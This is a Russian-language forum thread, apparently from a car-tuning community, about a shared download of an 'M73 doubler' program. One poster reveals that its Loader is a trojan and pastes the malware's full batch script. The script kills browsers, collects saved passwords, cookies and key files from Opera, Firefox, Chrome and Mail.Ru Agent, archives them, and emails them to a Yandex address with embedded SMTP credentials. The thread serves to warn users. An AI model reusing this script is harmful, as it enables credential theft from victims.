Goha 75 Опубликовано 8 мая, 2011 Опубликовано 8 мая, 2011 (изменено) привет всем вот нарыл ссылку мож кто в теме двоилка м73 Изменено 11 мая, 2011 пользователем MEG-2 4
kai-777 Опубликовано 9 мая, 2011 Опубликовано 9 мая, 2011 привет всем вот нарыл ссылку мож кто в теме двоилка м73 http://depositfiles.com/ru/files/8n8ed4f01 А ты сам пробовал прога не работает
Goha 75 Опубликовано 9 мая, 2011 Автор Опубликовано 9 мая, 2011 А ты сам пробовал прога не работает ВОТ смотри рно как снею работать увы не вьеду
ekonstantin Опубликовано 9 мая, 2011 Опубликовано 9 мая, 2011 (изменено) Файл Loader при просмотре очень похож на трояна. Ага, он и есть :) Создает файл C:\WINDOWS\Prefetch\Blat.exe Также там присутствуют строки taskkill /f /im opera.exe taskkill /f /im firefox.exe taskkill /f /im chrome.exe taskkill /f /im iexplore.exe taskkill /f /im magent.exe md C:\pass\ copy /y "blat.dll" "%SystemRoot%\blat.dll" copy /y "blat.exe" "%SystemRoot%\blat.exe" copy /y "blat.lib" "%SystemRoot%\blat.lib" copy /y "Rar.exe" "%SystemRoot%\Rar.exe" attrib C:\pass +h +s +a +r md C:\pass\opera\ CD /D %APPDATA%\Opera\Opera\ copy wand.dat C:\pass\opera\ >nul copy cookies4.dat C:\pass\opera\ >nul md C:\pass\MailAgent\reg regedit.exe -ea C:\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2 regedit.exe -ea C:\pass\MailAgent\reg\agent_3.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3 CD /D %APPDATA% Xcopy Mra\Base C:\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul Xcopy Mra\Update\ver.txt C:\pass\MailAgent /K /H /G /Q /R /S /Y >nul md C:\pass\Mozilla\ cd %AppData%\Mozilla\Firefox\Profiles\*.default\ copy cookies.sqlite C:\pass\Mozilla\ >nul copy key3.db C:\pass\Mozilla\ >nul copy signons.sqlite C:\pass\Mozilla\ >nul md C:\pass\Google\ cd %userprofile%\Local Settings\Application Data\Google\Chrome\User Data\Default\ copy /y Login* C:\pass\Google\ >nul copy /y Web Data* C:\pass\Google\ >nul copy /y Cookies* C:\pass\Google\ >nul copy /y %Windir%\Rar.exe C:\pass\ >nul C:\pass\rar.exe a -r C:\pass\pass.rar C:\pass\ copy /y %Windir%\blat.dll C:\pass\ copy /y %Windir%\blat.exe C:\pass\ copy /y %Windir%\blat.lib C:\pass\ del /s /q %SystemRoot%\Rar.exe del /s /q %SystemRoot%\blat.dll del /s /q %SystemRoot%\blat.exe del /s /q %SystemRoot%\blat.lib cd C:\pass\ blat.exe -install -server smtp.yandex.ru -port 587 -f sender.qq@yandex.ru -u sender.qq -pw qazxsw1213 ren *.rar pass.rar blat.exe -body surpriz -to fj0001@yandex.ru -attach pass.rar cd %Windir% rmdir /s /q C:\pass EXIT Изменено 9 мая, 2011 пользователем ekonstantin
Борис Р Опубликовано 9 мая, 2011 Опубликовано 9 мая, 2011 ВОТ смотри рно как снею работать увы не вьеду как запустить программу
Nemec Опубликовано 11 мая, 2011 Опубликовано 11 мая, 2011 на самом деле ничего вы не запустите, а вот Loader собирает пароли из браузеров и пытается куда-то отправить. автору башку открутить за это надо
magelan1 Опубликовано 12 мая, 2011 Опубликовано 12 мая, 2011 (изменено) Купите у автора (Dik) за 100 уе и не парьтесь, отобьется на нескольких машинах ,и все таки поддержка есть , а если кому нужно слепить двойную , стучитесь в личку. Изменено 12 мая, 2011 пользователем magelan1
v vovanshu Опубликовано 13 мая, 2011 Опубликовано 13 мая, 2011 Подтверждаю, после запуска лоайдера, сразу создается соединение и начинает ломиться в инет, авира это очень хорошо видит. Так, что не запускайте файл. А автора в бан пожизненный.
fcctuning Опубликовано 13 мая, 2011 Опубликовано 13 мая, 2011 Всегда говорил Халява хорошей не бывает
Рекомендуемые сообщения
Для публикации сообщений создайте учётную запись или авторизуйтесь
Вы должны быть пользователем, чтобы оставить комментарий
Создать аккаунт
Зарегистрируйте новый аккаунт в нашем сообществе. Это очень просто!
Регистрация нового пользователяВойти
Уже есть аккаунт? Войти в систему.
Войти